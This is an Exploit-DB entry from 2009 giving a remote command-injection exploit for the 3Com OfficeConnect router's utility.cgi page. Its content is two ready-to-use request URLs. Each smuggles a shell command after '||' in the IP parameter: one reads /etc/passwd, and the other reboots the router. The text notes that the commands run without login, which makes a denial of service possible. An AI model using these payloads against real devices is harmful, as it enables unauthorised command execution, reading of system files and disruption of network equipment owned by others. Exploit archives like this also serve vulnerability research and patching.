3Com OfficeConnect code execution

2009-10-19T00:00:00
ID EDB-ID:9862
Type exploitdb
Reporter Andrea Fabizi
Modified 2009-10-19T00:00:00

Description

3Com OfficeConnect code execution. Remote exploit for hardware platform

                                        
                                            ####### Remote command execution  #######

http://1.2.3.4/utility.cgi?testType=1&IP=aaa || cat /etc/passwd

To see the command output you need to log into the router, however the
command is executed even the user is not logged in, so if you don't
have access to the device a DOS is also possible:

http://1.2.3.4/utility.cgi?testType=1&IP=aaa || reboot